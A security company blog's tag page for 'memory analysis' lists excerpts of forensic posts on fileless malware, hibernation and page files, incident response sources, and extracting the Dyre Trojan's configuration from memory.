You are viewing 'memory analysis'

Fileless Malware

Memory Forensics Comes into the Light

David Biser

March 02, 2017 - Posted by David Biser to Threat Intelligence


Recently, fileless malware has shown up in numerous LinkedIn articles, blog posts and research papers. It’s being discussed as the “new” threat to watch out for. I agree that this is an important topic, but I do not agree that it is a new threat. Rather, it has been a threat long ignored and is now being rapidly exploited by attackers.

To give some information about the threat, fileless malware is found only in memory, not in a file on disk. This attack is actually using Meterpreter code inside the physical memory of a domain controller. Along with the presence of Meterpreter, analysts discovered the use of PowerShell scripts within the Windows Registry. For those who are unaware, Meterpreter is a tool from the Metasploit framework, a free hacking tool commonly used by both penetration testers and criminal hackers. Once the attackers have successfully installed Meterpreter, they use various scripts to install a malicious service on the targeted host. After... read more >

Hibernation and Page File Analysis

Not All Is Lost When You Lose Your Memory

Jeremy Scott

May 26, 2016 - Posted by Jeremy Scott to Security Insight

Computer Forensics

Some time ago I wrote a blog, Memory: It’s What’s for Dinner, about the importance of capturing volatile data and memory analysis. I also provided an intro for memory analysis in Hunting Malware with Memory Analysis and More Memory Fun. What happens if you are not able to grab memory? Obviously, a full memory capture of the suspect system will give you the best chance at recovering volatile information from the system but if you can’t, not all is lost.

Hibernation and page files contain data that can help put the pieces of the puzzle back together. The hibernation... read more >

Cybersecurity Incident Checklist: Top 5 Sources to Review During a Cyberattack

Go Blue Team, Go Blue Team, Go!

Donovan Farrow

August 20, 2015 - Posted by Donovan Farrow to Security Insight

Blue Team

Reading through the latest cybersecurity industry threads, I find a lot of the written information focuses on “How to Hack with (insert cool name here)”. This is great information when wanting to understand how to perform different hacking techniques or to assist someone who wants to sharpen their hacking skills. For those who want to learn more about how a breach got started, what the common lateral movements are and what the ultimate goal of the event was, you need to dig a little deeper.

Many of these articles are missing a very useful segment of the information security family — the Blue Team. If you are not familiar with the term “Blue Team” let me elaborate. The Blue Team is the incident response team. During a cybersecurity incident, the Blue Team is the group that finds the “evil” in your network environment. By evil, I am referring to the attacker and the tools the attacker used to compromise the... read more >

More Memory Fun

Using memory analysis to pull Dyre Trojan config

Jeremy Scott

July 09, 2015 - Posted by Jeremy Scott to Security Insight

A couple of years ago, I published a blog on Hunting Malware with Memory Analysis. Well, it is past time to dive back in to some memory analysis fun. This time, however, we will use memory analysis techniques to retrieve the Dyre Trojan configuration.

Dyre is a well-known banking Trojan that harvests credentials, primarily targeting online banking. It does this by using man-in-the-browser functionality and dynamic web injects to manipulate content on a financial institution's website and intercept credentials and sensitive information of the victim. This is where the configuration file comes in. The configuration file contains the proxy server(s) controlled by the attackers and the target bank URLs that trigger the man-in-the-browser to redirect the connection to the designated proxy server. Dyre’s configuration file looks like the following:

... read more >

Memory: It’s What’s for Dinner

Jeremy Scott

May 09, 2013 - Posted by Jeremy Scott to

Memory is the new vogue and rightfully so. My Solutionary teammate, Susan Carter, recently posted a related blog. Ironically, we were both crafting our posts about the same time but I want to drive home the importance of capturing volatile data and performing memory analysis.

In the past, forensics examinations involving computer systems were always performed by immediately disconnecting any compromised or infected hosts from the network. This is done with a “hard shutdown” or what has become known as “pulling the plug” and immediately acquiring a forensics image acquisition of the hard drive. The rationale for doing this as the first step is to preserve the state of the hard disk.

Now, the first step in any incident response scenario should be capturing the volatile data at the onset. This has become critical to identifying the extent of the compromise or infection. In... read more >

Voted one of the Best Computer Security Blogs 2016
NTT Security (US), Inc. (formerly Solutionary) is a security consulting and managed security services provider. The NTT Security blog is a place for IT professionals to both learn and talk about the latest in IT security and compliance.

Get the NTT Security Blog delivered to your inbox!

Enter your Email:

(We will not share your email or use it for anything else.)